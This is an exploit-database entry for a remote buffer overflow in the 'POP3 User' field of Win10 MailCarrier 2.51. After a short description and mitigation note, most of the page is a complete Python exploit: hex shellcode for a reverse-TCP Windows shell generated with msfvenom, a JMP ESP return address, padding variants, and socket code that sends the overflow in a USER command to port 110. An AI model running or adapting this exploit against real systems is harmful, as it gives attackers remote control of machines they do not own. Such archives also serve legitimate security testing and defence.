Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow

vendor:

Win10 MailCarrier

by:

Lance Biggerstaff

7.5

CVSS

HIGH

Remote Buffer Overflow

Buffer Overflow

CWE

Product Name: Win10 MailCarrier

Affected Version From: 2.51

Affected Version To: 2.51

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2019

Win10 MailCarrier 2.51 – ‘POP3 User’ Remote Buffer Overflow

This exploit allows an attacker to remotely trigger a buffer overflow in the 'POP3 User' field of Win10 MailCarrier version 2.51. By exploiting this vulnerability, an attacker can gain unauthorized access and control over the affected system. The exploit code is written in Python and includes a payload generated using msfvenom. It should be noted that different versions of Windows 10 may have different offsets, and sometimes the exploit needs to be run twice to successfully pop a shell.

Mitigation:

The vendor has not provided any specific mitigation steps for this vulnerability. It is recommended to update to the latest version of Win10 MailCarrier or use an alternative software.

Source

Exploit-DB raw data:

# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow
# Date: 2019-10-01
# Author: Lance Biggerstaff
# Original Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Tested on: Windows 10
# Note: Every version of Windows 10 has a different offset  and sometimes you need to run the exploit twice before you can pop a shell ¯\_(ツ)_/¯

#!/usr/bin/python

import sys
import socket
import time

#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISTENING_PORT -b '\x00\xd9' -f python

buf =  ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c"
buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce"
buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a"
buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6"
buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8"
buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75"
buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0"
buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc"
buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8"
buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba"
buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06"
buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94"
buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c"
buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe"
buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c"
buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d"
buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11"
buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12"
buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e"
buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d"
buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7"
buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27"
buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c"
buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0"
buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb"
buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7"
buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3"
buf += "\x32\xb4\xfe\x5c"

jmpesp = '\x23\x49\xA1\x0F'

# buffer length depends on length of source ip address, 5095 works for xxx.xxx.xx.x, you may need to tweak the length up or down
#buffer = '\x41' * 5093  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5094  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
buffer = '\x41' * 5095  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5096  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5097  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("TARGET", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"